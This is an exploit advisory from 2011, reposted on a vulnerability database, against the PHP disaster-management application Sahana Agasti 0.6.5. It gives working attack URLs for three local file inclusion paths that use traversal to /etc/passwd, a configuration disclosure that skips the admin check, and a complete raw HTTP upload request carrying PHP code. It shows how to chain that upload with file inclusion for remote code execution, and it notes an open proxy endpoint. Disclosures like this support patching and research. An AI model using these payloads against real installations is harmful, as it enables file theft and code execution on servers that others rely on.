Vulners
Lucene search
sahana agasti <= 0.6.5 - Multiple Vulnerabilities
:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ posdub[at]gmail.com ]
[ dun / 2011-01-07 ]
#############################################################
# [ Sahana Agasti <= 0.6.5 ] Multiple Vulnerabilities #
#############################################################
#
# Script: "Agasti is the PHP based project of the Sahana Software Foundation.
# Based a long-term preparedness for disaster management..."
#
# Script site: http://www.sahanafoundation.org/
# Download: https://launchpad.net/sahana-agasti/
#
[LFI] Vuln: ( Scenario 1)
http://site.com/sahana-0.6.5/www/stream.php?stream_type=/../../../../../../../../../etc/passwd%00
File: ./sahana-0.6.5/www/stream.php
20 $global['approot'] = realpath(dirname(__FILE__)).'/../';
21 // $global['approot'] = '/usr/local/bin/sahana/';
22 $global['previous']=false;
...(CUT)...
39 if(!$global['previous']){
40 $global['action'] = (NULL == $_REQUEST['act']) ?
41 "default" : $_REQUEST['act'];
42 $global['module'] = (NULL == $_REQUEST['mod']) ?
43 "home" : $_REQUEST['mod'];
44 }
45 $global['stream_type'] = $_GET['stream_type']; // [1]
...(CUT)...
52 shn_front_controller();
...(CUT)...
64 function shn_front_controller()
65 {
66 global $global;
67 global $conf;
68 $approot = $global['approot'];
69 $action = $global['action'];
70 $module = $global['module'];
...(CUT)...
90 if($global['stream_type'] && file_exists($approot.'/inc/lib_st_'.$global['stream_type'].'.inc') ){// [2]
91 require_once ($approot.'/inc/lib_st_'.$global['stream_type'].'.inc'); // [3] LFI
92 if(file_exists($approot.'/mod/'.$module.'/'.$global['stream_type'].'.inc'))
93 $default_file = $approot.'/mod/'.$module.'/'.$global['stream_type'].'.inc';
94 else
95 $default_file = 'stream.inc';
96 }
In this scenario script try to include something like this:
/var/www/apache/sahana/www/..//inc/lib_st_/../../../../../../../../../etc/passwd\0.inc
################################################################################################################################
[LFI] Vuln: ( Scenario 2)
http://site.com/sahana-0.6.5/www/stream.php?mod=/../../../../../../../../../etc/passwd%00
File: ./sahana-0.6.5/www/stream.php
42 $global['module'] = (NULL == $_REQUEST['mod']) ?
43 "home" : $_REQUEST['mod'];
...(CUT)...
70 $module = $global['module'];
...(CUT)...
90 if($global['stream_type'] && file_exists($approot.'/inc/lib_st_'.$global['stream_type'].'.inc') ){
91 require_once ($approot.'/inc/lib_st_'.$global['stream_type'].'.inc');
92 if(file_exists($approot.'/mod/'.$module.'/'.$global['stream_type'].'.inc'))
93 $default_file = $approot.'/mod/'.$module.'/'.$global['stream_type'].'.inc';
94 else
95 $default_file = 'stream.inc';
96 }else
97 $default_file = 'main.inc'; // [1]
98
99 // include the correct module file based on action and module
100 $module_file = $approot.'mod/'.$module.'/'.$default_file; // [2]
101 if (! file_exists($module_file)) { //
102 $module_file = $approot.'mod/home/'.$default_file;
103 }
...(CUT)...
109 //Include the module file
110 include($module_file); // [3] LFI
In this scenario script try to include something like this:
/var/www/apache/sahana/www/../mod//../../../../../../../../../etc/passwd\0/main.inc
################################################################################################################################
[LFI] Vuln: ( Scenario 3 without file_exists)
http://site.com/sahana-0.6.5/www/stream.php?act=adm&mod=/../../../../../../../../../etc/passwd%00
File: ./sahana-0.6.5/www/stream.php
42 $global['module'] = (NULL == $_REQUEST['mod']) ? // [1]
43 "home" : $_REQUEST['mod'];
...(CUT)...
84 if (preg_match('/^adm/',$action)) { //
85 $module = 'admin'; // [2]
86 $action = 'modadmin'; //
87 }
...(CUT)...
96 }else
97 $default_file = 'main.inc'; // [3]
98
99 // include the correct module file based on action and module
100 $module_file = $approot.'mod/'.$module.'/'.$default_file; // [4] ( /var/www/apache/sahana/www/../mod/admin/main.inc )
...(CUT)...
110 include($module_file); // [5]
...(CUT)...
125 $module_function = 'shn_'.$module.'_'.$action; // [6]
126 if (!function_exists($module_function)) { //
127 $module_function='shn_'.$module.'_default';
128 }
129 $_SESSION['last_module']=$module;
130 $_SESSION['last_action']=$action;
131 $output = $module_function(); // [7] ( shn_admin_modadmin() )
File: ./sahana-0.6.5/mod/admin/main.inc
161 function shn_admin_modadmin()
162 {
163 global $global;
164
165 // include original module admin section
166 include $global['approot']."/mod/".$global['module']."/admin.inc"; // [8] LFI
In this scenario script try to include something like this:
/var/www/apache/sahana/www/..//mod//../../../../../../../../../etc/passwd\0/admin.inc
################################################################################################################################
[Configuration disclosure] Vuln:
http://site.com/sahana-0.6.5/www/stream.php?mod=admin&act=conf_list
File: ./sahana-0.6.5/www/stream.php
100 $module_file = $approot.'mod/'.$module.'/'.$default_file; // [1] ( /var/www/apache/sahana/www/../mod/admin/main.inc )
...(CUT)...
110 include($module_file); // [2]
...(CUT)...
125 $module_function = 'shn_'.$module.'_'.$action; // [3]
126 if (!function_exists($module_function)) {
127 $module_function='shn_'.$module.'_default';
128 }
129 $_SESSION['last_module']=$module;
130 $_SESSION['last_action']=$action;
131 $output = $module_function(); // [4] ( shn_admin_conf_list() )
File: ./sahana-0.6.5/mod/admin/main.inc
31 include_once $global['approot']."mod/admin/conf_admin.inc"; // [5]
File: ./sahana-0.6.5/mod/admin/conf_admin.inc
22 function shn_admin_conf_list() // [6] Configuration disclosure
...(CUT)...
We can prepare function name, with using GET variables (mod, act)
We can use prepared functions with "shn_" prefix, with bypassing admin privileges
So lets see what next..
################################################################################################################################
[Arbitrary File Upload] Vuln:
http://site.com/sahana-0.6.5/www/stream.php?mod=admin&act=lc_file_browser
File: ./sahana-0.6.5/www/stream.php
131 $output = $module_function(); // [1] ( shn_admin_lc_file_browser()
File: ./sahana-0.6.5/mod/admin/main.inc
683 function shn_admin_lc_file_browser() // [2] Arbitrary File Upload
684 {
685 global $global;
686 $locale = $_POST['locale'];
687 //$file_type=$_POST['file_type'];
688 $uploaddir = "../res/locale/$locale/LC_MESSAGES/";
689 //"../res/locale/$locale/LC_MESSAGES/";
690 //echo $uploaddir;
691 $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
692
693 if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
694 add_confirmation('File uploaded sucessfully');
695 }else {
696 add_error('File uploaded failed');
697 }
698
699 }
We can upload some file to /res/locale/$locale/LC_MESSAGES/ (default $locale is my_MM),
with using prepared POST
Example:
POST /sahana-0.6.5/www/stream.php?mod=admin&act=lc_file_browser HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------11682257938924
Content-Length: 420
-----------------------------11682257938924
Content-Disposition: form-data; name="MAX_FILE_SIZE"
50000
-----------------------------11682257938924
Content-Disposition: form-data; name="userfile"; filename="file.txt"
Content-Type: text/plain
<?php phpinfo(); ?>
-----------------------------11682257938924
Content-Disposition: form-data; name="locale"
my_MM
-----------------------------11682257938924--
File /res/locale/my_MM/LC_MESSAGES/file.txt is created
We can use main.inc filename instead of file.txt
So let's go back to LFI ( scenario 1,2 ):
( scenario 1 ) http://site.com/sahana-0.6.5/www/stream.php?stream_type=/../../res/locale/my_MM/LC_MESSAGES/main
( scenario 2 ) http://site.com/sahana-0.6.5/www/stream.php?mod=/..//res/locale/my_MM/LC_MESSAGES/
It includes LC_MESSAGES/main.inc with our <?php phpinfo(); ?> (AFU+LFI=RCE)
################################################################################################################################
[PHP Proxy]
http://site.com/sahana-0.6.5/www/res/lib_proxy.php?url=http://site2.com/dupa.php
File: ./sahana-0.6.5/www/res/lib_proxy.php
17 $url = $_GET['url'];
18 $parseurl = urldecode($url);
19
20 // open cURL session
21 $ch = curl_init();
22 curl_setopt($ch, CURLOPT_POST,1);
23 curl_setopt($ch, CURLOPT_URL,$parseurl);
24 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
25 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
26 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
27
28 $xml = curl_exec($ch);
29 curl_close($ch);
30
31 header("Content-Type: text/xml");
32
33 echo $xml;
################################################################################################################################
And possible other bugs...
################################################################################################################################
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1